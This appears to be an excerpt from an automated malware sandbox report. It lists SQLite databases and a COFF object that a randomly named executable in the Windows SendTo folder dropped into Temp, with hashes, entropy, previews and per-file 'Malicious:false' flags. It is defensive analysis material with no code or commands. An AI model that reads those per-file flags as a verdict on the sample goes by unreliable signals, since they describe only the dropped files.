                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Pbb4RxJxRr

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\QLAT98aELL

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\QRuIS2NjsG

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\R7BqvEYBD4

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\RESC0BA.tmp

                                          Download File
                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Fri Sep 13 20:27:22 2024, 1st section name ".debug$S"
                                          Category:dropped
                                          Size (bytes):1952
                                          Entropy (8bit):4.558926822524163
                                          Encrypted:false
                                          SSDEEP:24:HhbW96XOWFXsDfHXwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:KcKAKhmMluOulajfqXSfbNtmh5Z
                                          MD5:61CF01F37B2568229B8F2FBB40375EEF
                                          SHA1:8541F6B8F469ACD1126F98924B5453E9A287DB2D
                                          SHA-256:88EEE5049D42EC3B20EC15616AF0A3F9281AD8A9A314F810C116D3A0E4DE7099
                                          SHA-512:FB95D06ADDD3066981BD8A2C32B227F3A4FF981BEC68ADA40638C2DE667A877CFE887B01A85F58B6D4ABBAA5E0E4396144375CDE08B96459D83E2707DD4F3D31
                                          Malicious:false
                                          Preview:L...*..f.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESC0BA.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                          C:\Users\user\AppData\Local\Temp\RPI1WZvraO

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\RUCz1pMvfS

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\RXZbWi86Jz

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\SbILkwBIAl

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Sl6WizPgVR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\TG1WbrV8SF

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\TJi5RrbYqq

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\U97NK4lKRN

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\UKsKnnTfSI

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\UhyiGUzGJM

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\UtoE2IJ2vo

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\UymYMmC6XR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Vb7gePoiNu

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\W4RoRw6UPd

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\W9B96FGRA4

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\WNa7C4RjEo

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Wi9e7o2gSR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\WiyvhDEUt3

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
